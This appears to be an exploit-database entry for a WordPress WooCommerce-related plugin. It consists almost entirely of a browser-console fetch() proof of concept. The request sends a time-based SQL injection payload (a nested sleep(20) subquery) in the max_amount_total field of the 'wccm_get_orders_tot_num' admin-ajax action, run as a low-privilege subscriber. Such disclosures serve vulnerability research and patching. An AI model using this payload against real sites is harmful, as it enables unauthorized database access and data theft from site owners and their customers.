## https://sploitus.com/exploit?id=WPEX-ID:1550E30C-BF80-48E0-BC51-67D29EBE7272
Run the below command in the developer console of the web browser while being on the blog as a subscriber user and note the 20s delayed response
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=wccm_get_orders_tot_num&start_date=2024-01-09&end_date=2024-01-11&min_amount=0&max_amount=0&min_amount_total=0&product_relationship=or&product_category_relationship=or&product_category_filters_relationship=and&statuses=wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft&max_amount_total=(select*from(select(sleep(20)))a)',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));